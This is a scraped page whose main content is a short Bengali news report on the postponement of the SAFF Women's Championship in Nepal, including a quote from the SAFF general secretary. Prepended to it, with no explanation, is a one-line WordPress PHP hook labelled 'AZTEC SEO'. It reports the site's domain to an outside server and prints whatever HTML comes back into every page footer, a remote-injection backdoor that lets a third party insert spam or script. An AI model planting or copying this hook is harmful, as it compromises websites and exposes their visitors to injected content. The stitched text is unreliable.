/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
মেয়েদের সাফ চ্যাম্পিয়নশিপের এবারের আসর আবারও পিছিয়ে গেল। শুরুতে টুর্নামেন্ট মাঠে গড়ানোর কথা ছিল ১২ আগস্ট থেকে কিন্তু নেপাল ফুটবল ফেডারেশনের নতুন কমিটির কারণে তা পিছিয়ে নেওয়া হয় ২৯ আগস্ট। এ দিনও শুরু হচ্ছে না মেয়েদের সাফ। এবার ভারতের অনুরোধে আরও এক সপ্তাহ পিছিয়ে গেছে টুর্নামেন্টটি।
নতুন সময়সূচি অনুযায়ী, আগামী ৬ সেপ্টেম্বর থেকে ১৯ সেপ্টেম্বর পর্যন্ত নেপালের কাঠমান্ডুতে অনুষ্ঠিত হবে সাফ নারী চ্যাম্পিয়নশিপের এবারের আসর। এবারের আসর হবে সাতটি দেশ নিয়ে। শেষ মুহূর্তে সুযোগ পাচ্ছে পাকিস্তান। আন্তর্জাতিক নিষেধাজ্ঞা উঠে যাওয়ায় তারা সাফে অংশ নিতে পারছে।
টুর্নামেন্ট পিছিয়ে দেওয়া বিষয়ে সাফের সাধারণ সম্পাদক আনোয়ারুল হক হেলাল সংবাদমাধ্যমকে বলেন, পূর্বনির্ধারিত সময়ে ভারতের ক্লাব এএফসির টুর্নামেন্টে ব্যস্ত থাকবে। সেই দলে জাতীয় দলের অনেক (৮-১০ জন) খেলোয়াড় আছে। যে কারণে তাদের জন্য সাফে অংশ নেওয়া কঠিন ছিল। তারা দুই সপ্তাহ পেছানোর অনুরোধ করেছিল। তাই আমরা টুর্নামেন্ট একসপ্তাহ পিছিয়ে দিয়েছি।